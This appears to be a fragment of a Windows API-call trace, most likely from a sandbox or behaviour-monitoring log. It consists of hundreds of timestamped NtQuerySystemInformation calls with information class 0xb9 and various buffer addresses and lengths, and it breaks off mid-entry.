NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f090, Length=0x20, ResultLength=0x0) [0238.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f090, Length=0x20, ResultLength=0x0) [0238.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f2e0, Length=0x20, ResultLength=0x0) [0238.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f370, Length=0x38, ResultLength=0x0) [0238.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f200, Length=0x20, ResultLength=0x0) [0238.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f180, Length=0x20, ResultLength=0x0) [0238.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f180, Length=0x20, ResultLength=0x0) [0238.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f180, Length=0x20, ResultLength=0x0) [0238.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f370, Length=0x38, ResultLength=0x0) [0238.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f200, Length=0x20, ResultLength=0x0) [0238.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f180, Length=0x20, ResultLength=0x0) [0238.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f180, Length=0x20, ResultLength=0x0) [0238.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f180, Length=0x20, ResultLength=0x0) [0238.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f370, Length=0x38, ResultLength=0x0) [0238.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f200, Length=0x20, ResultLength=0x0) [0238.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f190, Length=0x20, ResultLength=0x0) [0238.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f190, Length=0x20, ResultLength=0x0) [0238.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f498, Length=0x58, ResultLength=0x0) [0238.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f360, Length=0x58, ResultLength=0x0) [0238.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f280, Length=0x38, ResultLength=0x0) [0238.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f0b0, Length=0x28, ResultLength=0x0) [0238.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f0b0, Length=0x28, ResultLength=0x0) [0238.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f0b0, Length=0x28, ResultLength=0x0) [0238.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f0b0, Length=0x28, ResultLength=0x0) [0238.126] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.126] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.126] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f120, Length=0x28, ResultLength=0x0) [0238.126] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.126] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.126] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f280, Length=0x38, ResultLength=0x0) [0238.126] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.126] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f1a0, Length=0x28, ResultLength=0x0) [0238.129] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.129] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.129] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.129] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.129] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.129] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f1a0, Length=0x28, ResultLength=0x0) [0238.129] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.129] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.129] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f280, Length=0x38, ResultLength=0x0) [0238.130] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f100, Length=0x20, ResultLength=0x0) [0238.130] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f080, Length=0x20, ResultLength=0x0) [0238.130] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.130] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f080, Length=0x20, ResultLength=0x0) [0238.130] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.130] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f080, Length=0x20, ResultLength=0x0) [0238.130] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.130] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.130] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.130] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.130] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f280, Length=0x38, ResultLength=0x0) [0238.130] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f100, Length=0x20, ResultLength=0x0) [0238.130] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f090, Length=0x20, ResultLength=0x0) [0238.131] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.131] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.131] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.131] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f090, Length=0x20, ResultLength=0x0) [0238.131] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.131] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.131] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.131] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.131] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.131] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f360, Length=0x58, ResultLength=0x0) [0238.131] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.131] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f280, Length=0x38, ResultLength=0x0) [0238.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f0b0, Length=0x28, ResultLength=0x0) [0238.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f0b0, Length=0x28, ResultLength=0x0) [0238.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f0b0, Length=0x28, ResultLength=0x0) [0238.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f0b0, Length=0x28, ResultLength=0x0) [0238.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f120, Length=0x28, ResultLength=0x0) [0238.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f280, Length=0x38, ResultLength=0x0) [0238.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f1a0, Length=0x28, ResultLength=0x0) [0238.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f1a0, Length=0x28, ResultLength=0x0) [0238.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f040, Length=0x20, ResultLength=0x0) [0238.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217efc0, Length=0x20, ResultLength=0x0) [0238.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217efc0, Length=0x20, ResultLength=0x0) [0238.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217efc0, Length=0x20, ResultLength=0x0) [0238.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f280, Length=0x38, ResultLength=0x0) [0238.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f280, Length=0x38, ResultLength=0x0) [0238.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f100, Length=0x20, ResultLength=0x0) [0238.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f090, Length=0x20, ResultLength=0x0) [0238.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f090, Length=0x20, ResultLength=0x0) [0238.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f360, Length=0x58, ResultLength=0x0) [0238.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f280, Length=0x38, ResultLength=0x0) [0238.163] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.163] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f0b0, Length=0x28, ResultLength=0x0) [0238.163] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f0b0, Length=0x28, ResultLength=0x0) [0238.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f0b0, Length=0x28, ResultLength=0x0) [0238.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f0b0, Length=0x28, ResultLength=0x0) [0238.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f120, Length=0x28, ResultLength=0x0) [0238.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f280, Length=0x38, ResultLength=0x0) [0238.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f1a0, Length=0x28, ResultLength=0x0) [0238.168] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.168] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.168] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.168] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f1a0, Length=0x28, ResultLength=0x0) [0238.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f280, Length=0x38, ResultLength=0x0) [0238.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f100, Length=0x20, ResultLength=0x0) [0238.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f080, Length=0x20, ResultLength=0x0) [0238.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f080, Length=0x20, ResultLength=0x0) [0238.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f080, Length=0x20, ResultLength=0x0) [0238.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f280, Length=0x38, ResultLength=0x0) [0238.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f100, Length=0x20, ResultLength=0x0) [0238.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f090, Length=0x20, ResultLength=0x0) [0238.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f090, Length=0x20, ResultLength=0x0) [0238.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f360, Length=0x58, ResultLength=0x0) [0238.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f240, Length=0x38, ResultLength=0x0) [0238.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f080, Length=0x28, ResultLength=0x0) [0238.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f080, Length=0x28, ResultLength=0x0) [0238.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f080, Length=0x28, ResultLength=0x0) [0238.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f080, Length=0x28, ResultLength=0x0) [0238.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f0f0, Length=0x28, ResultLength=0x0) [0238.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f240, Length=0x38, ResultLength=0x0) [0238.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f240, Length=0x38, ResultLength=0x0) [0238.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f170, Length=0x28, ResultLength=0x0) [0238.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f170, Length=0x28, ResultLength=0x0) [0238.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f240, Length=0x38, ResultLength=0x0) [0238.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f240, Length=0x38, ResultLength=0x0) [0238.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.182] NtQuerySystemInformation 